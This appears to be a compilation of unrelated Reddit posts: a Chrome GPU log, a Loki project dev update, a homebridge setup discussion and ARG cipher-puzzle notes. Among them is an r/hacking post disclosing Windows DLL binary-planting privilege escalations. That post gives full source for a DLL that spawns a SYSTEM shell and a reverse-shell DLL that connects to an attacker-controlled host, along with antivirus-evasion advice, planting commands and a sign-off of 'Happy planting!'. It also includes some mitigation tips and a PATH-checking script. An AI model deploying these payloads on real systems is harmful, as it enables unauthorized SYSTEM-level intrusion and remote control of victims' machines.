szDriverModelLocalized WDDM 2.5 szDriverName C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_830a0263f2ee97ce\nvldumdx.dll,C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_830a0263f2ee97ce\nvldumdx.dll,C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_830a0263f2ee97ce\nvldumdx.dll,C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_830a0263f2ee97ce\nvldumdx.dll szDriverNodeStrongName oem12.inf:0f066de38c1ebff8:Section094:\ven_10de&dev_1c03 szDriverSignDate Unknown szDriverVersion 26.21.0014.3630 szKeyDeviceID Enum\PCI\VEN_10DE&DEV_1C03&SUBSYS_61613842&REV_A1 szKeyDeviceKey \Registry\Machine\System\CurrentControlSet\Control\Video{81D81F87-DB28-11E9-B156-D43D7E9345F6}\0000 szManufacturer NVIDIA szMiniVdd unknown szMiniVddDateEnglish Unknown szMiniVddDateLocalized unknown szMonitorMaxRes Unknown szMonitorName Generic PnP Monitor szNotesEnglish No problems found. szNotesLocalized No problems found. szOverlayEnglish Supported szRankOfInstalledDriver 00D12001 szRegHelpText Unknown szRevision Unknown szRevisionId 0x00A1 szSubSysId 0x61613842 szTestResultD3D7English Not run szTestResultD3D7Localized Not run szTestResultD3D8English Not run szTestResultD3D8Localized Not run szTestResultD3D9English Not run szTestResultD3D9Localized Not run szTestResultDDEnglish Not run szTestResultDDLocalized Not run szVdd unknown szVendorId 0x10DE Log Messages GpuProcessHost: The unsandboxed GPU process exited normally. Everything is okay. GpuProcessHost: The unsandboxed GPU process exited normally. Everything is okay. [12548:2044:0920/] : compileToBinary(259): C:\fakepath(75,10-46): warning X3571: pow(f, e) will not work for negative f, use abs(f) or conditionally handle negative values if you expect them C:\fakepath(97,10-46): warning X3571: pow(f, e) will not work for negative f, use abs(f) or conditionally handle negative values if you expect them
submitted by MegaDeox to chrome

Weekly Dev Update 01/07/2019

Hey Y’all,

A big Dev Update this week – especially for Loki Core with lots of pull requests needing to be merged as we work towards a final release. Last week we released the Loki Core 4.0.0 Hefty Heimdall testnet binaries, and the Loki Storage Server 1.0.0 binaries. We also released a new version of the Loki Launcher to tie everything together.
We would love it if everyone could jump onto testnet and run some Service Nodes using the Loki Launcher in the next few weeks – you’ll be able to store messages for Loki Messenger for the first time! Bug reports are welcome! Please send them to their respective repositories on GitHub.

Loki Core
Loki Launcher
The Loki Launcher is a Node.js package that allows for the independent management of all the components required to run a full Service Node. This includes managing Lokinet, lokid, and the Loki Storage Server. When Loki Service Nodes begin to route data and store messages for Lokinet and Loki Messenger, the Loki Launcher will need to be run on every single Service Node.
The Launcher is currently in a testing phase, so you should only use it on testnet and stagenet – feedback/issues and pull requests would be greatly appreciated though!
What’s going on this week with Loki Launcher:
This week we got Loki Launcher ready to work for testnet binaries. This involved slightly adjusting the way Loki Launcher works, particularly how it downloads new Loki software.
GitHub Pulse: Excluding merges, 2 authors have pushed 38 commits to master and 38 commits to all branches. On master, 16 files have changed and there have been 607 additions and 367 deletions.
If you’re on our Discord you might catch Jeff or Ryan, the developers of LLARP, live streaming as they code.
What’s going on this week with Lokinet:
As part of our reliability work, we added more metrics and continued working on our path build failure messages, while cleaning up various things along the way. We also made sure the files Lokinet creates are of the correct permissions to avoid leaking any keys.
Pull Requests:
Loki Messenger Desktop
Storage Server
Messenger Mobile (iOS and Android)
submitted by Keejef to LokiProject

A few binary plating 0-days for Windows

A long time ago, while we were looking for a way to escalate privileges during a pen-test, we discovered that most Windows installations were vulnerable to binary planting. We contacted Microsoft, but they claimed that it was not a product vulnerability, since security had been weakened by 3rd party applications that allowed overly permissive file access. On the one hand this was correct; on the other, those 3rd party applications (the publishers of which were also notified) were not the only ones to blame, as the insecure DLL search path is definitively part of the operating system, which tries to load another Microsoft DLL that does not exist.
Anyway, sometime later I continued the research and started developing a tool to help detect and exploit similar vulnerabilities. However, days are too short and I never managed to find the time to finish it. So, I decided to publish the few Windows 0-days I still have, to help other pen-testers while these tricks still work.


The initial vulnerability that we discovered in October 2012 was related to the “Internet Key Exchange and Authenticated Internet Protocol Keying Modules”. Those modules are used for authentication and key exchange in Internet Protocol security. The problem was that they try to load a DLL which doesn’t exist. This leaves the operating system vulnerable to various binary planting opportunities that depend on the PATH environment variable.
In fact, the “IKE and AuthIP IPsec Keying Modules” service is started automatically under the “Local System” account and points to “svchost -k netsvcs”, which then loads “IKEEXT.DLL”, which in turn attempts to load the missing “wlbsctrl.dll” file by looking in the following directories, in order: the loading directory, %WINDIR%\System32, %WINDIR%\System, %WINDIR%, the current working directory, and %PATH%. If one of the folders from the PATH environment variable is writable, then any authenticated user can plant a nasty DLL file which will be executed as SYSTEM during the next reboot.
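To make that search order concrete, here is a small illustrative Python sketch (my own helper, not part of any Microsoft tooling) that lists the candidate paths the loader would probe for a missing DLL; the first writable directory probed before any directory that actually contains the DLL is a planting spot:

```python
import os

def dll_search_candidates(dll_name, loading_dir, windir, cwd, path_env):
    """Return candidate full paths in the search order described above."""
    dirs = [
        loading_dir,                        # directory of the loading binary
        os.path.join(windir, "System32"),
        os.path.join(windir, "System"),
        windir,
        cwd,                                # current working directory
    ]
    # ...and finally each entry of the PATH environment variable:
    dirs += [d for d in path_env.split(os.pathsep) if d]
    return [os.path.join(d, dll_name) for d in dirs]
```

Running it for "wlbsctrl.dll" immediately shows how far down the list a PATH entry sits, and why a writable PATH folder is enough when the DLL exists nowhere else.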
This binary planting can be exploited when a program gives too much access (e.g. Create Files / Write Data privilege for anybody) on a local subfolder that is ultimately added to the PATH environment variable. Such a problem is very frequent with the root folder since access permissions for files and subfolders are inherited from the parent directory when a directory is created in “C:\”. Members of the “Authenticated Users” group have the “Create Folders / Append Data” right on all directories created within the root folder, which may then offer an enticing privilege escalation vector. So, any member of the “Authenticated Users” group can escalate his privileges to “SYSTEM” when an application that does not restrict write access to its folder is installed and gets added to the system PATH environment variable. Something which occurs quite frequently. Additionally, many developers and sysadmins also modify the PATH manually to facilitate their daily duties or migration phases. This too will often permit an attacker to trigger the vulnerability.
From Microsoft’s point of view, the 3rd party vendors are to blame because the vendor’s installer didn’t remove the write permission on their application directory before adding it to the PATH. From the perspective of 3rd party vendors, Microsoft is to blame because Windows tries to search for another Microsoft DLL which doesn’t exist. While, in a sense, both are right, it is the end user who ultimately pays the price. Because neither Microsoft nor the 3rd party developers assumed their own responsibilities, Windows users stayed exposed for many years.
Others have since done a great job of automating the exploitation of the vulnerability, e.g.: “itm4n” created a PowerShell script to trigger the vulnerability by opening a dummy VPN connection with “rasdial” to force the vulnerable service to start. There is also an “ikeext_service” module in MSF thanks to “Meatballs”, which lets you leverage an insecure path to plant your favorite Meterpreter.
Today the automated trigger is still far from being guaranteed and it often requires a reboot in order to load our malicious DLL as SYSTEM. This presents no issue for a Black Hat, but is quite limiting for a Red Team. So, the time had come to find other binary planting opportunities… This is why I started the Inseminator project, the goals of which were to:
  • Identify writable directories from the path.
  • Enumerate the binaries invoked by services which start as NT AUTHORITY\SYSTEM.
  • Generate a list of DLLs loaded by those services.
  • Parse those DLLs to identify further DLL loads and update the list accordingly.
  • Check if each of the DLLs in the list exists in a system directory.
  • Automate the exploitation by planting an arbitrary DLL in the right place with the right name and offering several payload opportunities.
Unfortunately, this project was put on stand-by for a long time and I couldn’t find the time to finish it. I will therefore publish today some raw findings.
Inseminator's output sample


The most interesting binary planting opportunities are the ones which are related to system services, since they permit escalation to the highest level of privileges on the target. To identify them, I simply used a logger for the payload and created a bunch of testing DLLs with a command like this one:
for /F "tokens=*" %A in (BinaryPlantingList.txt) do copy poc.dll.logger64 c:\Python27\%A 
It turns out that:
  • Upon startup the “svchost.exe” is executed with the “utcsvc” service group, which starts a single service called “DiagTrack” (i.e., the “Diagnostics Tracking Service”) by loading “C:\WINDOWS\system32\diagtrack.dll”. This library tries to load the missing DLL “diagtrack_wininternal.dll” several times per day.
  • The “diagtrack.dll” library also tries to load the missing “WindowsPerformanceRecorderControl.dll” and “diagtrack_win.dll” libraries from time to time (but less often than “diagtrack_wininternal.dll”).
  • The library “diagtrack_win.dll” is also called by the “Microsoft Compatibility Appraiser” system task, which is scheduled to run “C:\Windows\System32\CompatTel\diagtrackrunner.exe” at 3am by default (and runs whether a user is logged on or not).
  • The library “WindowsPerformanceRecorderControl.dll” is also invoked from time to time by other libraries, like from “C:\Windows\system32\TelLib.dll” or through the debugger engine with a call from “dbgeng.dll”.
The “Diagnostics Tracking Service” was initially pushed as an optional Windows 8.1 update (KB3022345) to collect personal data and send it back to Microsoft. However, these days this service is not really optional, and it is used by Microsoft to collect data about functional issues in most versions of Windows. So perhaps it is fitting that it ultimately permits arbitrary code execution. This is yet another reason for end users to dislike this tracker. Moreover, it is likely possible to trigger the call on demand by generating an error, since logs are collected when a functional problem is detected.
There are also other insecure DLL loads introduced by 3rd party applications. I have, for example, already witnessed the McAfee VirusScan Enterprise engine trying to load a missing “mfebopa.dll”, a DLL initially intended to provide behavioral “buffer overflow” protection but which in this case offered a substantial privilege escalation opportunity.
Tracking high-privileges libraries calls with DLL-based loggers
There are also some less interesting binary planting opportunities which still permit the loading of arbitrary libraries, but in the context of the current user. This is not as useful from a local privilege escalation perspective, but it may still open some doors on shared systems and kiosks. Firefox, for example, often tries to load the missing “dcomp.dll” library, and the ClickShare wireless presentation system from Barco always tries to load the Microsoft Direct3D library “d3d8.dll”, which is not always present when users plug in the projector's USB dongle.
Tracking low-privileges libraries calls with DLL-based loggers


Many 3rd party applications do contain a writable sub-folder which is part of the PATH environment variable. For example, I identified issues with Roxio, HP Digital Imaging, ACER eDataSecurity, Micros Systems OPERA, OpenView OmniBack, Novell GroupWise, IBM AppScan, Python, Perl, Ruby, TCL, PHP, MySQL, Zend, and many others. As a rule of thumb, development tools often permit an attacker to leverage these vulnerabilities.
In practice, the easiest way to get local admin rights on many Windows systems is to simply put your favorite DLL in a writable folder that is part of the %PATH% and give it the name of one of those missing system libraries. You then just need to wait and your code will be executed several times by the end of the day as NT AUTHORITY\SYSTEM (even if it’s a production server which is never rebooted).
The DLL will be executed by a system service and will therefore run in session 0, which is non-interactive. Since Vista, services have been isolated this way to protect them from malicious code running in a user's session (starting from session ID 1). However, this does not really present a problem for our exploit. If our payload tries to interact with the desktop (for example, by running a CMD), the “Interactive Services Detection” service will draw a blinking button on the taskbar and prompt the user to “view the message”, switching to the session 0 desktop where our code is running. The “UI0Detect.exe” binary invoked by “Interactive Services Detection” has been removed from Windows 10 v1803 and Windows Server 2019, but those OSes are not our targets here.
The Interactive Services Detection kindly permits us to interact with our payload running in session 0
Our planted DLL is running with the highest level of privileges
When we have our SYSTEM shell in session 0, we can then easily get another shell in the usual session 1, for example, with PSEXEC:
psexec -s -i 1 -d cmd.exe 
We can then close our original shell and return to the standard user desktop to keep enjoying a SYSTEM shell.
After removing the DLL call monitoring, here is what's left of the payload. This quick and dirty code will let you compile a DLL that runs a local shell when it gets loaded:
```cpp
// Compiled with mingw64 in Codeblocks
// Static compilation: -static-libgcc -static-libstdc++
// 64 bits compilation: -march=x86-64 -m64
// Linker options: --static -lwsock32 -lws2_32
#include "main.h"
#include <windows.h>

extern "C" DLL_EXPORT BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
        {
            STARTUPINFO si;
            PROCESS_INFORMATION pi;
            memset(&si, 0, sizeof(si));
            memset(&pi, 0, sizeof(pi));
            DWORD creationFlags;
            si.cb = sizeof(STARTUPINFO);
            si.lpDesktop = (LPSTR)"winsta0\\default";
            creationFlags = CREATE_NEW_CONSOLE;
            creationFlags |= CREATE_NEW_PROCESS_GROUP;
            creationFlags |= CREATE_BREAKAWAY_FROM_JOB;
            CreateProcess("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, FALSE,
                          creationFlags, NULL, NULL, &si, &pi);
            break;
        }
        case DLL_PROCESS_DETACH:
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}
```
Obviously, we might prefer opening a shell on a remote system instead of the local target, thus avoiding local interactions with the desktop in session 0.
I advise against directly using a reverse Meterpreter, since it would be caught by any AV. A preferred way is to simply open a socket and spawn a reverse shell to an attacker-controlled system, and then to play with Mimikatz or Meterpreter injection in a second phase. Here is another quick and dirty code example which does just that:
```cpp
// Compiled with mingw64 in Codeblocks
// Static compilation: -static-libgcc -static-libstdc++
// Compiler options: -march=x86 [for 32 bits] or -march=x86-64 -m64 [for 64 bits]
// Other compiler option: -Wno-write-strings
// Linker options: --static -lwsock32 -lws2_32
#include <winsock2.h>
#include <windows.h>
#include <string>

// Set your remote handler here:
#define IPADDR ""
#define PORT 443

using namespace std;

SOCKET sock;

SOCKET getSocket()
{
    SOCKET sock;
    SOCKADDR_IN sin;
    sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    sin.sin_addr.s_addr = inet_addr(IPADDR);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(PORT);
    connect(sock, (SOCKADDR *)&sin, sizeof(sin));
    return sock;
}

std::string InitMe()
{
    sock = getSocket();
    STARTUPINFO siStartupInfo;
    PROCESS_INFORMATION piProcessInfo;
    memset(&siStartupInfo, 0, sizeof(siStartupInfo));
    memset(&piProcessInfo, 0, sizeof(piProcessInfo));
    siStartupInfo.cb = sizeof(siStartupInfo);
    siStartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    // Wire the child's standard handles to the socket for a remote shell:
    siStartupInfo.hStdInput = (HANDLE)sock;
    siStartupInfo.hStdOutput = (HANDLE)sock;
    siStartupInfo.hStdError = (HANDLE)sock;
    CreateProcess(0, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE,
                  NULL, NULL, &siStartupInfo, &piProcessInfo);
    //WaitForSingleObject(piProcessInfo.hProcess, INFINITE);
    return "TRUE";
}

extern "C" __declspec(dllexport) BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
        {
            WSADATA WSAData;
            WSAStartup(MAKEWORD(2, 0), &WSAData);
            InitMe();
            break;
        }
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}
```


Be careful about your %PATH%! Pay attention to 3rd party applications which may silently add a writable directory to this environment variable (especially if they install on the root drive), and don’t make the same mistake yourself.
Here is another quick and dirty piece of code in Python 2 to help you identify writable folders in your %PATH%, where any missing DLL could be planted by a bad guy:
```python
import os
import sys

sysPath = "path"
filetest = "\\inseminator.wperm"

def is_writable(path):
    # Checking Write Permission
    try:
        filehandle = open(path, 'w')
        filehandle.close()
        os.remove(path)
        return True
    except IOError:
        return False

print("[+] Searching for writable folders within %PATH%")
try:
    require = os.environ[sysPath]
except KeyError:
    sys.exit(" [-] Unrecoverable error: %" + sysPath.upper() + "% variable is not defined!")

dicPath = os.environ[sysPath].split(";")
WritablePath = []
for item in dicPath:
    if item:
        if is_writable(item + filetest):
            print " [-] Directory '" + item + "' is writable"
            WritablePath.append(item)
```
If any writable directory is found, you should either remove it from the %PATH% or harden ACLs to ensure authenticated users (and any other untrusted accounts) are unable to write inside.
It is also advised to create some dummy DLL files in %WINDIR%, since this directory has a higher priority than the PATH folders, but is only queried if the searched libraries are not present in the loading directory, %WINDIR%\System32, or %WINDIR%\System. At a bare minimum, it is advised to create the following fake libraries if they do not exist on your system:
  • diagtrack_wininternal.dll
  • windowsperformancerecordercontrol.dll
  • diagtrack_win.dll
  • wlbsctrl.dll
To a lesser extent, it is also advised to create these dummy libraries:
  • mfebopa.dll
  • dcomp.dll
  • d3d8.dll
That’s all for today. Happy planting!
Frédéric BOURLA
submitted by TheFRoGito to hacking

Discussion: Homebridge Guide? Lessons and Alternatives...

Facing the task of rebuilding my homebridge from scratch due to my own stupidity, I was curious if people here know of a good homebridge setup guide.
Obviously, there's no "one best way" to set up homebridge (which is a good thing!), but maybe we can discuss how people have done it here and what you would've done differently.
I'll start:
My homebridge adventure started by trying to spin up a "raspberry pi/lightweight" optimized Linux ISO as a VM (I have a multi-functional server I leave running for stuff like this), but after several attempts to get it running, I gave up and just decided to spin up a vanilla Ubuntu Server (v17) ISO and use that as a base. Why Ubuntu? That was the last distro that was "popular" the last time I really dealt with anything Linux. Plus, with its Debian roots, I knew the package management was better (correct me if I'm wrong). Also, I think it already had Node pre-installed, which made installing homebridge a little easier (but it also caused issues later on).
My plugins (which I added only one at a time, over a period of a year) were:
  1. homebridge-camera-ffmpeg: this was tricky as it required ffmpeg to be installed, and I ran into some issues with all of its dependencies, but eventually I got it working and hooked it into my ancient Foscam 8910Ws.
  2. homebridge-harmonyhub: I ran out and bought a Harmony Hub so that I could control my home theatre via Siri. This was also tricky and required me to create a bunch of Harmony activities that I can trigger with Siri, since a Harmony activity maps to a HomeKit switch. After some convoluted workarounds, I had Siri turning the volume up and down and turning on the devices.
  3. Panasonic TV and Pioneer AV Receiver plugins: these were simple plugins that allowed me to turn OFF (not on) the TV and to turn the receiver on/off.
  4. SSH Switch: I set up a switch to run SSH commands on my router to turn VPNs on/off. This allowed me to say "hey siri, turn on/off US VPN". Handy when I needed to view geo-locked content.
  5. ecobee-sensors: This was a slightly more complicated setup and required some manual steps to add an API link to my Ecobee account. But it was handy for surfacing the Ecobee sensors as occupancy sensors to trigger some light switch automations, and for surfacing the individual temperatures throughout the house.
  6. Dummy switches: used to automate geofence smart locks without requiring the additional automation prompt.
  7. Dafang Camera: this is the one that did me in. I had the cheap Dafang camera "working" but had some issues getting a reliable stream, so after some mucking about, I completely hosed my homebridge setup. Probably due to upgrading ffmpeg and/or installing mongodb.
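For anyone curious what item 6 looks like in practice, dummy switches are usually just an accessory entry in homebridge's config.json. A hypothetical minimal fragment (accessory type and option names assumed from the common homebridge-dummy plugin; check its README for the real schema):

```json
{
  "accessories": [
    {
      "accessory": "DummySwitch",
      "name": "Geofence Unlock Trigger",
      "stateful": false
    }
  ]
}
```

A non-stateful switch flips itself back off, which is what makes it usable as a fire-and-forget automation trigger.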
TL;DR: So are there some homebridge setups that are way out in left field? Share your experiences and what you would have done differently.
submitted by machineglow to homebridge

Elysium Repack has been updated!

Just letting everyone know that, as promised, the repack has received its monthly update.
Notable changes:
submitted by brotalnia to wowservers

More info but nothing new solved

So I'm gonna dump some info I have gathered one more time. Nothing too cool. I hope you find it useful and maybe this helps to decrypt some of the messages! For now, it's all been failure on my end!

Decrypted posts:
F04_nod.redd -> Even though it's decrypted, I'm not sure. It may be a key for something

Some nice resources:
> Cryptography
> ARGs/internet mysteries/creepypastas

> Steganography

- Analysis of a plain english text encoded in base32 against the long message:
```
>>>>>>>>>>>>>>>>>> PLAIN ENGLISH ENCODED
LEN -> 653
IC  -> 0.0369
######################################
D  -> 38 (12.14)   3  -> 38 (12.14)   H  -> 36 (11.50)   X  -> 32 (10.22)   R  -> 30 (9.58)
P  -> 29 (9.27)    8  -> 29 (9.27)    M  -> 27 (8.63)    F  -> 27 (8.63)    9  -> 27 (8.63)
######################################
W7 -> 15 (16.48)   D3 -> 11 (12.09)   PM -> 11 (12.09)   3R -> 11 (12.09)   BX -> 8 (8.79)
C8 -> 7 (7.69)     X3 -> 7 (7.69)     RA -> 7 (7.69)     HK -> 7 (7.69)     E3 -> 7 (7.69)
######################################
3RA -> 6 (13.33)   X3R -> 5 (11.11)   3RK -> 5 (11.11)   9BX -> 5 (11.11)   KM3 -> 4 (8.89)
3DE -> 4 (8.89)    W7Z -> 4 (8.89)    8W7 -> 4 (8.89)    7ZH -> 4 (8.89)    XE3 -> 4 (8.89)
<<<<<<<<<<<<<<<<<
```
- The first message has only 32 different characters (23456789ABCDEFGHJKLMNPQRSTUVWXYZ) in a message that is 695 chars long, which suggests some sort of Base32 encoding
- The second message has 13 words of 13 letters with a charset of 36 (if we count the space) different characters.
Some of the characters here are not present in the first message (012345689ABCDEFGHIJKLMNOPQRSTUVWXYZ)
- Could this be a matrix for a Hill Cipher? ->
- "To help one is to help all" -> may come from the law of one by ra
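The index of coincidence figure in the dump above is easy to recompute. A small Python sketch using the standard IC definition (for reference, uniform random text over a 32-symbol alphabet gives 1/32 ≈ 0.0313, so 0.0369 is only slightly biased):

```python
from collections import Counter

def index_of_coincidence(text):
    """IC = sum over symbols of f*(f-1), divided by N*(N-1)."""
    n = len(text)
    if n < 2:
        return 0.0
    counts = Counter(text)
    return sum(f * (f - 1) for f in counts.values()) / (n * (n - 1))
```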
+ How to attack this:
- One way the first message could be encrypted is by using a custom base32 alphabet
  1. Set a randomly sorted base32 alphabet
  2. Decrypt the encrypted message using it
  3. Check the fitness of the result
  4. Modify the alphabet
Seems straightforward. But you can't check all alphabet permutations, because 32! = 263130836933693530167218012160000000.
What to do, then?
- Define transformations of the alphabet like swapping elements, sliding pieces of the alphabet, shuffle chunks,...
- Swap failing characters in the alphabet (those that decrypt to non-printable characters)
- Define a fitness function that depends on the english frequencies of bigrams, trigrams or quadgrams. Or maybe one based on the printability of the output
- If we assume that most of the characters are in the range A-Za-z then we can set a rule:
Let us analyze the first character of the string: V
V can be any number from 0 to 31... or can it? See, if we assume that the first character is a letter (which may not be the case if the original text is shuffled before the encryption), and also a capital letter (maybe it's the "T" from "To help ..."), then we have a couple of restrictions on what V can be. ASCII uppercase letters have values ranging from 0x41 (01000001) to 0x5a (01011010), so the 5-bit value V encodes must look like 01---.
The catch here is the space character (' ' 0x20 00100000) which doesn't start with 01 and can be frequent in the text. Other punctuation symbols have similar issues.
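Putting the pieces above together, here is a hedged Python sketch (helper names are mine, not from the ARG) of the core decode-and-score primitive such a hill-climber needs: decode against a candidate alphabet, then score printability; the climber would swap alphabet positions and keep changes that raise the score:

```python
import base64

STD = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"  # standard RFC 4648 base32 alphabet

def decode_with_alphabet(ct, alphabet):
    """Decode ct as base32 written with a custom 32-char alphabet."""
    # Map the candidate alphabet back onto the standard one, then decode.
    std_ct = ct.translate(str.maketrans(alphabet, STD))
    return base64.b32decode(std_ct + "=" * (-len(std_ct) % 8))

def printability(data):
    """Fraction of printable ASCII bytes -- a crude fitness function."""
    return sum(32 <= b < 127 for b in data) / max(len(data), 1)
```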

- My best guess here is that this seemingly random chunk of html is to be hashed and a key generated from that, or used as-is as some sort of encryption key.
- Source of the chunk ->

- The easy solution that seems too easy to be a solution -> THEJUNGLEBOOK
- Notice it's 13 characters long (can this be used with other 13-char long strings that are present throughout the subreddit?)
- Tried to use this as an OTP key for the water_swift with no luck using either the numbers or the letters (I think I did this, but give it a try just in case I didn't do it or did it wrong)

- A mime with a broom. It might not be an original image but, if it isn't, I haven't been able to locate the original.
- Outguess returns that no bits are available when attempting to decrypt. This seems weird, but I don't know if it means something
- Most of the pictures seem to be related with other ARGs/internet mysteries/creepypastas
- On the side of the right shack, we can see on the roof a strange drawing and XY
+ How to attack this:
- It might have some hidden info so you can check steganography software like outguess and attempt to recover the hidden information by bruteforcing the key with a list of words. Since we don't know whether there is information hidden (or even if reddit compresses the images when uploading them, which would kill any chance of hiding stuff in them), this might lead to nothing.

- Charset (57): 03456789BCDEFGHIJKLMNOPQRSTUVWXZabcdefghijklmnopqrsuvwxyz
- 13 characters per string, 13 strings
- This could be a table of keys.
+ How to attack?
- No idea. So start with the basics:
- Frequency analysis:
 ('0', 9), ('r', 8), ('b', 7), ('q', 6), ('m', 5), ('H', 5), ('J', 5), ('9', 5), ('8', 4), ('g', 4), ('a', 4), ('N', 4), ('x', 4), ('F', 4), ('V', 4), ('h', 3), ('j', 3), ('E', 3), ('S', 3), ('e', 3), ('O', 3), ('v', 3), ('C', 3), ('f', 3), ('z', 3), ('7', 3), ('n', 3), ('o', 3), ('X', 3), ('W', 3), ('d', 2), ('K', 2), ('Z', 2), ('k', 2), ('B', 2), ('G', 2), ('s', 2), ('y', 2), ('Q', 2), ('c', 2), ('T', 2), ('5', 2), ('p', 2), ('i', 2), ('R', 2), ('l', 2), ('3', 2), ('I', 2), ('L', 2), ('P', 1), ('D', 1), ('U', 1), ('w', 1), ('4', 1), ('6', 1), ('u', 1), ('M', 1) 
- A similar analysis as with the Paige12 post can be done.
- The fact that it's 31 different characters may come from the fact that the message is not very long or it may be that there are only 31 characters in the alphabet.
- It's likely that the top message uses the same alphabet
- In the top message not all words are the same length (13 - 6 - 12 - 6 - 13)

- Another chunk of html.
- A similar one ->
- Might be an old implementation of some sort of MM Chat ->
- 859 chars long

- 13 hexadecimal character
- This could be a One Time Pad (OTP). In this case what you do is you take a string that is also 13 chars long and xor each character with a 13 char long key. To decrypt, xor the encrypted result with the key.
+ How to attack:
- Take all 13 char long strings and xor them against this.
- The problem with OTP is that, unless you know the key, the ciphertext can be made to say anything you want by decrypting it with the right key:
>> Let's assume I want the plaintext to be THEJUNGLEBOOK. What I need to do is xor each character of THEJUNGLEBOOK with the corresponding character of the encrypted message. That gives me c1 db ea 0c c3 71 22 83 a2 7d 61 79 4d. I can now use this as the key to xor the encrypted message and get THEJUNGLEBOOK as plaintext
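To make that malleability claim concrete, here's a quick sketch. The ciphertext here is randomly generated, since the actual 13 bytes of the message aren't reproduced in these notes:

```python
import os

def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))

# Hypothetical 13-byte ciphertext (stand-in for the real message bytes)
ciphertext = os.urandom(13)

# Pick ANY 13-char plaintext we'd like the message to "decrypt" to...
desired = b"THEJUNGLEBOOK"

# ...and derive the key that makes it so
fake_key = xor_bytes(ciphertext, desired)

# "Decrypting" with that key yields our chosen plaintext
assert xor_bytes(ciphertext, fake_key) == desired
```

This is exactly why an OTP ciphertext alone proves nothing about its plaintext: every 13-char message is reachable under some key.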

- A link to a section of oocities and a series of numbers and words. Will do a bot to check them sites!
Found omega in Found 1313 in Found allag in Found omega in Found omega in Found 1313 in Found omega in Found 1313 in Found 1313 in 
- This was found crawling only the main index. The bot may need to go deeper underground!
- The words are 13 13 omega allag weinstein challa g57
- g57 may be another medical code ->

- 20 8-letter strings
- It may use the same algorithm as the first post

- Another chunk of html (1507 chars)
- Seems to come from facebook somehow. Similar code ->
- A C program which outputs something like this:
1313 >> 20 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 
- >> indicates the input I gave it
- This could be used to sort some of the characters in the encrypted messages.
- The encryption could be just writing the characters in order and then taking them out in columns. For example:
- We want to encrypt ATTACKATDAWN
- We lay the text according to this pyramid
- Extract the text by columns -> ATAAWTCTWKDA
- To decrypt, just lay the text in columns and enjoy. Combine this with some sort of substitution to reduce your sanity levels!
- A python implementation:
    def main():
        n, i, c, a = (1, 1, 1, 1)
        print('1313')
        # Will break if a string is input
        n = int(input())
        # Since python's range goes [1,n) we need to add one to the top limit
        for i in range(1, n + 1):
            for c in range(1, i + 1):
                print('%d ' % a, end='')
                a += 1
            print()
        return 0
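Since the exact pyramid layout isn't pinned down, here's a sketch of the plain rectangular version of the idea (write the text row by row, read it out column by column); the real cipher may well use a different grid shape:

```python
def encrypt_columnar(text: str, ncols: int) -> str:
    """Write the text row by row into ncols columns, read it out column by column."""
    rows = [text[i:i + ncols] for i in range(0, len(text), ncols)]
    return ''.join(''.join(row[c] for row in rows if c < len(row))
                   for c in range(ncols))

def decrypt_columnar(cipher: str, ncols: int) -> str:
    """Invert the transposition by rebuilding the column lengths."""
    nrows, extra = divmod(len(cipher), ncols)
    cols, pos = [], 0
    for c in range(ncols):
        length = nrows + (1 if c < extra else 0)
        cols.append(cipher[pos:pos + length])
        pos += length
    return ''.join(cols[c][r]
                   for r in range(nrows + (1 if extra else 0))
                   for c in range(ncols) if r < len(cols[c]))

# 'ATTACKATDAWN' in a 4-wide grid:
#   A T T A
#   C K A T
#   D A W N
# Read by columns -> 'ACDTKATAWATN'
cipher = encrypt_columnar('ATTACKATDAWN', 4)
assert cipher == 'ACDTKATAWATN'
assert decrypt_columnar(cipher, 4) == 'ATTACKATDAWN'
```

Swapping the rectangle for the pyramid only changes how the row lengths are computed; the read-out-by-columns step stays the same.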
- Here starts the shit. The encrypted text (if it is an encrypted message), not only plays with the different characters, but it also adds formatting to the equation. Is this important? Can I ignore italics and other such artifacts? Probably not. Probably not...

- This looks like substitution + transposition. Are the spaces moved around too? If not, how many combinations of a one-letter word followed by a two-letter word make sense in English?
- Give it a try with the program of the stockwood post
- Check them candidate algorithms:
> Vigenere
> Autokey
> Beaufort
> Running key
> Hill cipher
> ADFGVX cipher
> Playfair cipher
> Moar ->
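For reference, a minimal sketch of the first candidate on the list: classic Vigenère over uppercase A-Z. This is the textbook example, not tied to the puzzle text in any way:

```python
def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Classic Vigenere: shift each letter by the corresponding key letter."""
    out = []
    for i, ch in enumerate(text):
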